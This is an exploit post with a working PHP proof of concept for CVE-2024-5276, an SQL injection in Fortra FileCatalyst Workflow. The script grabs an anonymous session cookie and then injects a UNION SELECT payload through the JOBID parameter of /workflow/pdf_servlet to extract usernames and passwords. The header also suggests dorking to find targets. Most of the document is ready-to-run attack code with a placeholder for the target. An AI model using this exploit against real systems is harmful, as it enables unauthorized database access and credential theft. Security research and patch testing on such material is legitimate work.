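=============================================================================================================================================
| # Title : Fortra FileCatalyst Workflow v5.1.6 Build 135 SQL Injection Vulnerability (CVE-2024-5276)                                      |
| # Author : indoushka                                                                                                                      |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                           |
| # Vendor : https://www.fortra.com/fr/lignes-de-produit/filecatalyst                                                                       |
=============================================================================================================================================

POC :

[+] Dorking in Google or another search engine.

[+] Code Description: The code extracts an anonymous JSESSIONID first and then uses it to send an SQL injection
    payload through the JOBID parameter of /workflow/pdf_servlet.
    ( https://packetstorm.news/files/id/180866/  CVE-2024-5276 )
    Note: this is an SQL injection PoC, not PHP code injection; the title above has been corrected accordingly.

[+] save code as poc.php.

[+] Set Target : edit the single $target line at the bottom of the script.

[+] Usage : php poc.php

[+] PayLoad :

<?php

/**
 * Fetches an anonymous JSESSIONID from the FileCatalyst Workflow web UI.
 *
 * The PoC only needs whatever session cookie the server hands out on a plain
 * GET of /workflow/; no credentials are involved at this stage.
 */
class SessionExtractor
{
    /** @var string Base URL of the target, trailing slash removed. */
    protected $target;

    /** @var string User-Agent sent with every request. */
    protected $userAgent;

    /** @var string|null Session cookie value once extracted, null before. */
    protected $jsessionid = null;

    /** @var int HTTP status code of the last completed request (0 before any request). */
    protected $lastHttpCode = 0;

    /**
     * @param string $target Base URL, e.g. "https://host/" (trailing slash optional).
     */
    public function __construct($target)
    {
        $this->target = rtrim($target, '/');
        $this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
    }

    /**
     * Performs a GET and returns the raw response (headers + body) as one string.
     *
     * TLS verification is deliberately disabled (VERIFYHOST/VERIFYPEER = false)
     * because lab targets commonly use self-signed certificates. That makes the
     * request trivially interceptable, so do not reuse this helper outside a PoC.
     * Because redirects are followed with CURLOPT_HEADER on, the returned string
     * contains the header block of every hop, not just the final one.
     *
     * @param string   $url     Absolute URL to request.
     * @param string[] $headers Extra request headers, each as "Name: value".
     * @return string Raw response; the process exits on a transport error.
     */
    protected function sendRequest($url, $headers = [])
    {
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL            => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HEADER         => true,
            CURLOPT_FOLLOWLOCATION => true, // follow redirects
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_USERAGENT      => $this->userAgent,
            CURLOPT_HTTPHEADER     => $headers,
        ]);

        $response = curl_exec($ch);
        if ($response === false || curl_errno($ch)) {
            $error = curl_error($ch);
            curl_close($ch);
            die("cURL Error: " . $error . "\n");
        }

        $this->lastHttpCode = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);

        return $response;
    }

    /**
     * Extracts the JSESSIONID value from a raw HTTP response.
     *
     * Pure helper (no I/O) so the cookie parsing can be tested on its own.
     * Matching is case-insensitive on the header name and stops at the first ';'.
     *
     * @param string $rawResponse Headers (+ body) as returned by sendRequest().
     * @return string|null Cookie value, or null when no JSESSIONID Set-Cookie header is present.
     */
    public static function parseSessionId($rawResponse)
    {
        if (preg_match('/Set-Cookie:\s*JSESSIONID=([^;]+)/i', $rawResponse, $matches)) {
            return trim($matches[1]);
        }

        return null;
    }

    /**
     * Requests /workflow/ once and records the JSESSIONID the server sets.
     *
     * The value is cached on the instance, so repeated calls do not re-request.
     * It is also written to session.txt next to the script (kept from the original
     * PoC so the cookie can be reused by hand). Exits when no cookie is found.
     *
     * @return string The extracted session id.
     */
    public function getSessionId()
    {
        if ($this->jsessionid !== null) {
            echo "[*] JSESSIONID already extracted: {$this->jsessionid}\n";
            return $this->jsessionid;
        }

        echo "[*] Attempting to extract JSESSIONID...\n";
        $response = $this->sendRequest("{$this->target}/workflow/");

        $sessionId = self::parseSessionId($response);
        if ($sessionId === null) {
            die("[-] JSESSIONID not found. Check the link.\n");
        }

        $this->jsessionid = $sessionId;
        if (file_put_contents("session.txt", $this->jsessionid) === false) {
            echo "[!] Could not write session.txt (continuing)\n";
        }
        echo "[+] JSESSIONID extracted: {$this->jsessionid}\n";

        return $this->jsessionid;
    }
}

/**
 * Sends the SQL injection payload through the JOBID parameter of
 * /workflow/pdf_servlet, using the anonymous session from SessionExtractor.
 */
class Indoushka extends SessionExtractor
{
    /**
     * Builds the request URL for a given payload.
     *
     * @param string $payload Raw SQL fragment; URL-encoded here.
     * @return string Absolute URL of the injection request.
     */
    public function injectionUrl($payload)
    {
        return "{$this->target}/workflow/pdf_servlet?JOBID=" . urlencode($payload);
    }

    /**
     * Fires the payload and reports what came back.
     *
     * The "success" verdict is a heuristic carried over from the original PoC:
     * it only checks whether the response contains the strings "Success" or
     * "Admin", which can easily misfire in either direction. The HTTP status
     * and response length are printed so the result can be judged manually.
     *
     * @param string $payload SQL fragment to inject into JOBID.
     * @return bool True when the heuristic marker was found in the response.
     */
    public function injectSQL($payload)
    {
        if ($this->jsessionid === null) {
            die("[-] No session ID found. Run getSessionId() first.\n");
        }

        echo "[*] Sending SQL Injection payload...\n";
        $headers  = ["Cookie: JSESSIONID={$this->jsessionid}"];
        $response = $this->sendRequest($this->injectionUrl($payload), $headers);

        echo "[*] HTTP status: {$this->lastHttpCode}, response length: " . strlen($response) . " bytes\n";

        $markerFound = strpos($response, "Success") !== false || strpos($response, "Admin") !== false;
        if ($markerFound) {
            echo "[+] SQL Injection executed successfully!\n";
        } else {
            echo "[-] SQL Injection failed. Check input validity.\n";
        }

        return $markerFound;
    }
}

// Run only when executed directly (php poc.php); when the file is included,
// the classes are defined but no requests are sent. One session is fetched and
// reused, instead of fetching two separate sessions as the original did.
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    $target = 'https://ADD_TARGET_HERE/'; // <-- set the target here (single place)

    $injector = new Indoushka($target);
    $injector->getSessionId();

    // Custom payload, as in the original PoC. The column count and table/column
    // names are assumptions about the target schema; adjust them per target.
    $payload = "' UNION SELECT username, password FROM users --";
    $injector->injectSQL($payload);
}
?>

Greetings to :=====================================================================================

jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|

===================================================================================================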